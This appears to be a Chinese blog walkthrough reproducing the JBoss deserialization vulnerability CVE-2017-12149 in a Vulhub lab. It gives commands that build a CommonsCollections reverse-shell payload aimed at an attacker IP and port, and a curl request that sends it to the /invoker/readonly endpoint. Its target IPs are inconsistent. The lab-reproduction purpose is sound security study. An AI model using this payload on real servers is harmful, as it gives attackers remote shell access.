【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现
环境 【【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现】目标(Kali):http://192.168.0.11:8080/
操作机(Paroot):192.168.0.131
文章图片
文章图片
过程 下载POC:https://github.com/joaomatosf/JavaDeserH2HC
文章图片
POC使用方法:
攻击机下载执行执行生成二进制payload文件:javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java #修改接收shell的主机ip和端口java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.135.100:1234 (IP:端口)curl向被攻击服务器发送攻击payload:
curl http://192.168.135.4:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
文章图片
虽然好像有几个警告,但是还是可以使用的。
文章图片
操作及开启监听
文章图片
向目标发送payload
文章图片
成功反弹shell
文章图片
参考资料 http://www.mianhuage.com/695.html
推荐阅读
- 宽容谁
- 我要做大厨
- 增长黑客的海盗法则
- 画画吗()
- 2019-02-13——今天谈梦想()
- 远去的风筝
- 三十年后的广场舞大爷
- 叙述作文
- 20190302|20190302 复盘翻盘
- 学无止境,人生还很长